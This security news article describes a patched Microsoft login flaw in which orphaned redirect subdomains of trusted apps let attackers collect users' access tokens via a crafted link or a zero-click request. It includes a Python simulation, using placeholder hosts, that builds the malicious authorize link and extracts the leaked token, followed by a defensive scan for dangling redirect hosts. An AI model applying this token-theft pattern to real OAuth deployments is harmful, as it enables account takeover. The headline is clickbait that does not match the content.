Data Security

This Outlook bug lets hackers access your emails just like Hillary Clinton

According to web application security specialists, a recently patched vulnerability in Microsoft's login system could have been exploited to trick users into granting attackers full access to their online accounts.

Thanks to this vulnerability, threat actors could silently extract access tokens and use them to reach victims' accounts without ever entering a password. These tokens are issued by the login system to applications or websites after the user has authenticated once; from then on they stand in for the username and password, keeping the user's session alive and letting third-party web applications act on the account without the user having to hand over a password to them too.

The web application security experts behind the report note that Microsoft left a loophole which, if exploited, let attackers redirect these access tokens to a host they controlled without the victim noticing anything unusual.

The researchers found dozens of unregistered subdomains tied to Microsoft-developed applications. These first-party applications are trusted by default, so the login system issues them access tokens automatically, without prompting the user for consent, and it sends those tokens to the redirect addresses the application has on file, including the orphaned subdomains. Once a threat actor registers such a subdomain, all that remains is to trick the user into clicking a specially crafted link, sent by email or placed on a website, and the access token is delivered to the attacker.

Most worryingly, web application security specialists say the attack needs minimal user interaction: a malicious website can automatically fire a request equivalent to clicking the link, stealing the user's token in the same way without a click.
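The two paragraphs above describe an OAuth implicit-flow token leak through an orphaned redirect host, plus the zero-interaction variant. The following simulation, added here and not taken from the researchers' report or from any Microsoft code, walks through that flow end to end and finishes with the check a defender would run: enumerate every registered redirect URI and flag hosts whose DNS points at a cloud name nobody currently owns. Every hostname, client ID, DNS record and token value is constructed for illustration (login.example, client-portal-app, legacy-portal.cloudapp.example and so on); none is a real Microsoft identifier.

```python
"""Simulated OAuth implicit-flow token leak through an orphaned redirect URI.

Hypothetical example: every hostname, client ID, DNS record and token value
below is constructed for illustration; none is a real Microsoft identifier.
"""
import secrets
from typing import Dict, List, Optional, Set, Tuple
from urllib.parse import parse_qs, urlencode, urlparse, urlunparse

AUTHORIZE_ENDPOINT = "https://login.example/oauth2/authorize"  # hypothetical provider

# Registry of first-party apps the provider trusts without a consent prompt.
# Each entry lists the redirect URIs the app registered.  Constructed data.
PRE_CONSENTED_APPS: Dict[str, dict] = {
    "client-portal-app": {  # hypothetical client_id
        "redirect_uris": [
            "https://portal.example/signin",
            "https://legacy-portal.example/signin",  # subdomain was abandoned
        ],
    },
}

# Constructed DNS view: hostname -> CNAME target (None means a live A record).
DNS_CNAME: Dict[str, Optional[str]] = {
    "portal.example": None,
    "legacy-portal.example": "legacy-portal.cloudapp.example",
}
# Cloud hostnames that currently have an owner; the legacy target is not among
# them, so anyone can claim it and receive whatever is redirected there.
CLAIMED_CLOUD_HOSTS: Set[str] = {"other.cloudapp.example"}


def build_authorize_url(client_id: str, redirect_uri: str) -> str:
    """The link an attacker sends.  Nothing in it looks suspicious: the domain
    is the provider's own and the app is a trusted first-party app."""
    query = urlencode({
        "client_id": client_id,
        "response_type": "token",   # implicit flow: token comes back in the URL fragment
        "redirect_uri": redirect_uri,
        "scope": "mail.read",
    })
    return f"{AUTHORIZE_ENDPOINT}?{query}"


def authorize(url: str, user_logged_in: bool = True) -> Optional[str]:
    """Simulated provider: exact-match the redirect URI against the app's
    registered list, skip consent because the app is pre-consented, and
    redirect with the token in the fragment.  Returns the Location header."""
    params = {k: v[0] for k, v in parse_qs(urlparse(url).query).items()}
    app = PRE_CONSENTED_APPS.get(params.get("client_id", ""))
    if app is None or not user_logged_in:
        return None
    redirect_uri = params.get("redirect_uri", "")
    if redirect_uri not in app["redirect_uris"]:
        return None  # unregistered redirect URI: correctly refused
    token = "eyJ." + secrets.token_urlsafe(16)  # constructed bearer token
    fragment = urlencode({"access_token": token, "token_type": "Bearer"})
    return urlunparse(urlparse(redirect_uri)._replace(fragment=fragment))


def token_from_redirect(location: str) -> Optional[str]:
    """What the attacker's page on the hijacked subdomain does: read the token
    out of the fragment (location.hash in a browser).  The fragment is never
    sent to a server, so the provider sees nothing unusual."""
    frag = parse_qs(urlparse(location).fragment)
    return frag.get("access_token", [None])[0]


def dangling_redirect_hosts(apps: Dict[str, dict], cname: Dict[str, Optional[str]],
                            claimed: Set[str]) -> List[str]:
    """Defensive check: flag registered redirect URIs whose host points at a
    cloud name nobody currently owns, i.e. a subdomain-takeover candidate."""
    findings = []
    for client_id, app in apps.items():
        for uri in app["redirect_uris"]:
            host = urlparse(uri).hostname or ""
            target = cname.get(host)
            if target is not None and target not in claimed:
                findings.append(f"{client_id}: {uri} -> {target} (unclaimed)")
    return findings


def demo() -> Tuple[Optional[str], List[str]]:
    """Run the attack against the constructed registry and the defender's scan."""
    link = build_authorize_url("client-portal-app", "https://legacy-portal.example/signin")
    location = authorize(link)  # victim is logged in; no consent prompt is shown
    stolen = token_from_redirect(location) if location else None
    return stolen, dangling_redirect_hosts(PRE_CONSENTED_APPS, DNS_CNAME, CLAIMED_CLOUD_HOSTS)


if __name__ == "__main__":
    stolen_token, findings = demo()
    print("token leaked to attacker-controlled host:", stolen_token is not None)
    for finding in findings:
        print("dangling redirect host:", finding)
```

The provider in this simulation does everything the OAuth specification asks of it (exact redirect-URI matching, token only for a registered client); the weakness is entirely that a registered redirect host no longer belongs to the application owner. That is why the check at the end operates on DNS ownership rather than on the authorization request, and why the zero-click variant works: a hidden image or iframe pointing at the crafted link is enough, since the logged-in user's session cookie is sent automatically.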

The good news is that the unregistered subdomains found have already been reported to Microsoft, which prevents their malicious use. However, the experts note that more such subdomains could still exist. The report was submitted in October and the company fixed the fault about twenty days later.

This is not the first flaw found in the Microsoft login system. Last year, web application security specialists at the International Institute of Cyber Security (IICS) reported that the company had fixed a security flaw that allowed hackers to alter the records of a Microsoft subdomain in order to extract access tokens.
